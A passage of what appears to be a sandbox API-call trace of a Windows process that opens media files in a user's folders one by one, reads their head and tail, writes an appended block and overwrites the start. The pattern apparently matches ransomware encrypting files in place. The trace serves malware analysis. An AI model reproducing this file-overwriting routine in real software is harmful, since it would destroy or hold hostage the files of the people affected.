lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.669] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.669] ReleaseMutex (hMutex=0x168) returned 1 [0180.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows Live Mail.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0180.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows Live Mail.url", cchWideChar=21, lpMultiByteStr=0x1f88b2c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows Live Mail.url", lpUsedDefaultChar=0x0) returned 21 [0180.669] ReadFile (in: hFile=0x1dc, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x2d5f2bc*=0x85, lpOverlapped=0x0) returned 1 [0180.670] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0180.670] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0180.670] CloseHandle (hObject=0x1dc) returned 1 [0180.671] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\9dHpE5\\OBOuS4iqgJ FjaLAUIah\\qmBFG3Du6y5z4uEDt30.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\9dhpe5\\obous4iqgj fjalauiah\\qmbfg3du6y5z4uedt30.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.671] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.671] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xaa36 [0180.671] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.671] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.671] ReleaseMutex (hMutex=0x168) returned 1 [0180.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qmBFG3Du6y5z4uEDt30.mp3", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0180.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qmBFG3Du6y5z4uEDt30.mp3", cchWideChar=23, lpMultiByteStr=0x1f88b2c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qmBFG3Du6y5z4uEDt30.mp3", lpUsedDefaultChar=0x0) returned 23 [0180.672] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.673] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9a36 [0180.673] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.673] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9a36 [0180.673] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.673] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.673] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.673] CloseHandle (hObject=0x1dc) returned 1 [0180.674] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\f73fI\\D5 c5MPD0_c5_nWi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\f73fi\\d5 c5mpd0_c5_nwi.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.674] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.674] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1397f [0180.674] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.674] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.674] ReleaseMutex (hMutex=0x168) returned 1 [0180.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D5 c5MPD0_c5_nWi.m4a", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0180.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D5 c5MPD0_c5_nWi.m4a", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="D5 c5MPD0_c5_nWi.m4a", lpUsedDefaultChar=0x0) returned 20 [0180.674] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.675] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1297f [0180.676] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.676] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1297f [0180.676] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.676] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.676] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.676] CloseHandle (hObject=0x1dc) returned 1 [0180.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\kEGn-7rcTvps-n\\YT2H9R_8fYxR-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\kegn-7rctvps-n\\yt2h9r_8fyxr-.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.677] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.677] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x8377 [0180.677] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.677] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.677] ReleaseMutex (hMutex=0x168) returned 1 [0180.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YT2H9R_8fYxR-.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0180.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YT2H9R_8fYxR-.wav", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YT2H9R_8fYxR-.wav", lpUsedDefaultChar=0x0) returned 17 [0180.677] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.678] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7377 [0180.679] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.679] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7377 [0180.679] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.679] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.679] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.679] CloseHandle (hObject=0x1dc) returned 1 [0180.680] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZG8F2EpJkbZbDCsd.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zg8f2epjkbzbdcsd.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.680] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.680] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x98bd [0180.680] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.680] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.680] ReleaseMutex (hMutex=0x168) returned 1 [0180.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZG8F2EpJkbZbDCsd.m4a", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0180.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZG8F2EpJkbZbDCsd.m4a", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZG8F2EpJkbZbDCsd.m4a", lpUsedDefaultChar=0x0) returned 20 [0180.680] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.681] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x88bd [0180.682] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.682] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x88bd [0180.682] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.682] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.682] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.682] CloseHandle (hObject=0x1dc) returned 1 [0180.683] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\vjxabaP-h8_Bmy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5kv2w3l69- l7u9zn7\\vjxabap-h8_bmy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.683] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.683] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x17b17 [0180.683] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.683] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.683] ReleaseMutex (hMutex=0x168) returned 1 [0180.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vjxabaP-h8_Bmy.gif", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0180.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vjxabaP-h8_Bmy.gif", cchWideChar=18, lpMultiByteStr=0x1f88b2c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vjxabaP-h8_Bmy.gif", lpUsedDefaultChar=0x0) returned 18 [0180.684] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.685] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x16b17 [0180.685] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.685] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x16b17 [0180.685] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.686] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.686] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.686] CloseHandle (hObject=0x1dc) returned 1 [0180.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T5rUid_7VMhEN.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t5ruid_7vmhen.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.687] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.687] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x9d52 [0180.687] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.687] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.687] ReleaseMutex (hMutex=0x168) returned 1 [0180.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="T5rUid_7VMhEN.gif", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0180.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="T5rUid_7VMhEN.gif", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T5rUid_7VMhEN.gif", lpUsedDefaultChar=0x0) returned 17 [0180.687] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.688] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x8d52 [0180.688] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.689] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x8d52 [0180.689] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.689] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.690] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.690] CloseHandle (hObject=0x1dc) returned 1 [0180.690] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\EoH7mBquEvOKApaV8\\0vdbevjFN.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\eoh7mbquevokapav8\\0vdbevjfn.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.690] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.690] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x77e0 [0180.690] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0180.690] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.690] ReleaseMutex (hMutex=0x168) returned 1 [0180.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0vdbevjFN.flv", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0vdbevjFN.flv", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0vdbevjFN.flv", lpUsedDefaultChar=0x0) returned 13 [0180.690] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.691] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x67e0 [0180.691] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.692] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x67e0 [0180.692] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.692] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0180.692] WriteFile (in: hFile=0x1dc, lpBuffer=0x26b2008*, nNumberOfBytesToWrite=0x1000, 